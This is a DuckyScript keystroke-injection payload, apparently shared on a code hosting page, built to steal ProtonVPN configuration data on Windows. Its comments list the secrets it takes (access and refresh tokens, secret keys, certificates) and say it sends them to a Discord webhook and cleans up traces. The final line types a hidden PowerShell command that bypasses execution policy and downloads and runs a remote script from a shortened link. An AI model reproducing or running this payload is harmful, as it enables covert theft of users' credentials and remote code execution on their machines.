Aleff
35 lines
1.6 KiB
Plaintext
35 lines
1.6 KiB
Plaintext
REM ###################################################################
|
|
REM # |
|
|
REM # Title : ProtonVPN-config-to-Discord-Exfiltration |
|
|
REM # Author : Aleff |
|
|
REM # Version : 1.0 |
|
|
REM # Category : Exfiltration |
|
|
REM # Target : Windows 10-11 |
|
|
REM # |
|
|
REM ###################################################################
|
|
|
|
REM Title: ProtonVPN-config-to-Discord-Exfiltration
|
|
REM Author: Aleff
|
|
REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
|
REM In the config file you can find a lot information about the user like:
|
|
REM - UserUid
|
|
REM - UserAccessToken
|
|
REM - UserRefreshToken
|
|
REM - UserAuthenticationPublicKey
|
|
REM - UserAuthenticationSecretKey
|
|
REM - UserAuthenticationCertificatePem
|
|
REM - UserCertificationServerPublicKey
|
|
REM - and so on...
|
|
REM Then it cleans up traces of what you have done after.
|
|
REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
|
|
REM Version: 1.0
|
|
REM Category: Credentials, Exfiltration
|
|
REM Requirements: ProtonVPN user logged at least one time and internet connection
|
|
REM
|
|
|
|
|
|
DELAY 2000
|
|
GUI r
|
|
DELAY 250
|
|
STRINGLN powershell -w h -ep bypass $discord='';irm bit.ly/ProtonVpnConfigScript | iex
|